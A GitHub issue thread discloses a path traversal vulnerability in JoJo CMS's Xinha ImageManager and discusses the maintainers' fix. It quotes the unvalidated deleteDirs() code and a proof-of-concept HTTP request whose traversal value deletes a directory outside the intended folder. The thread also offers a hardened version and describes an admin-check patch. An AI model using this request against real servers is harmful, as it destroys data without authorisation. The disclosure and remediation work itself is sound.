
A path traversal vuln in jojocms #30

Closed
kevinoclam opened this issue Jul 27, 2017 · 6 comments

@kevinoclam

kevinoclam commented Jul 27, 2017

There is a path traversal vulnerability that can delete any folder on the server, and it can be done by an unauthorized remote attacker.
Code
./plugins/jojo_core/external/xinha/plugins/ImageManager/Classes/ImageManager.php
line 602~608
```php
// The URL-decoded 'deld' value is passed straight to _delDir() with no validation.
function deleteDirs() {
    if (isset($_GET['deld']))
        return $this->_delDir(rawurldecode($_GET['deld']));
    else
        return false;
}
```
The parameter $_GET['deld'] should be filtered.
PoC

```http
GET /plugins/jojo_core/external/xinha/plugins/imageManager/backend.php?__plugin=ImageManager&__function=images&dir=/&deld=/../../../../../../../../001/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/plugins/jojo_core/external/xinha/plugins/imageManager/backend.php?__plugin=ImageManager&__function=images
Cookie:
Connection: close
Upgrade-Insecure-Requests: 1
```

[screenshot: before the post]
[screenshot: after the post]

Chen ruiqi
Codesafe Team
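As an added example (not JoJo CMS or Xinha code, and not the patch the maintainers applied in this thread), a hardened form of the reported deleteDirs() that refuses any decoded `deld` value resolving outside a fixed base directory; the base directory path and the function names are assumptions:

```php
<?php
// Added example, not JoJo CMS or Xinha code: a hardened replacement for the
// deleteDirs() pattern in the report. The URL-decoded 'deld' value is never
// handed to the filesystem directly; it is resolved against a fixed base
// directory and refused unless the result stays inside that directory.

// Assumption (hypothetical path): the directory the ImageManager may manage.
const IMAGE_BASE_DIR = '/var/www/site/images';

/**
 * Resolve $userPath relative to $baseDir and return the canonical absolute
 * path, or null if it does not exist or escapes $baseDir (via "..", an
 * absolute path, or a symlink).
 */
function resolveInsideBase(string $baseDir, string $userPath): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null; // base directory missing or unreadable
    }
    // A leading "/" is taken relative to the base, never the filesystem root.
    $candidate = $base . DIRECTORY_SEPARATOR . ltrim($userPath, "/\\");
    $real = realpath($candidate); // collapses ".." and resolves symlinks
    if ($real === false) {
        return null; // target does not exist
    }
    // Accept only the base itself or a descendant of it.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($real !== $base && strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null; // resolved outside the base directory
    }
    return $real;
}

/** Hardened deleteDirs(): same entry point, but refuses anything outside the base. */
function deleteDirsHardened(array $get): bool
{
    if (!isset($get['deld'])) {
        return false;
    }
    $target = resolveInsideBase(IMAGE_BASE_DIR, rawurldecode($get['deld']));
    if ($target === null || $target === realpath(IMAGE_BASE_DIR)) {
        return false; // traversal attempt, or an attempt to remove the base itself
    }
    return rmdir($target); // rmdir() only removes empty directories
}
```

With the report's `deld` value the resolve step returns null (the path either does not exist or resolves outside the base) and nothing is removed. This containment check complements the access-control fix discussed later in the thread rather than replacing it.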

@frankblundt
Contributor

Cool. Thanks. Will patch it.

Xinha is third-party code that is no longer being updated so will patch the local copy

@frankblundt
Contributor

Although to get to that path you would have to have Jojo installed inside your web root folder which is not in any way recommended, for exactly this reason (and probably a whole bunch of others), which is the main reason it was designed to run from outside root.

@antonyspalding
Contributor

I'm thinking that a requirement to have admin permissions on the xinha would cover it.

@antonyspalding
Contributor

Okay, I've added an .htaccess file that prepends a file to every file and requires the $isadmin variable to be set, so that even if you do have it in the webroot you have to call it through Jojo (so that $isadmin is set) and be logged in as admin.

Please test and let us know if this fixes all your concerns.

@frankblundt
Contributor

nice.

@kevinoclam
Author

Well, unauthorized users cannot use the ImageManager and ExtendedFileManager with the patch.
The patch fixes it well.
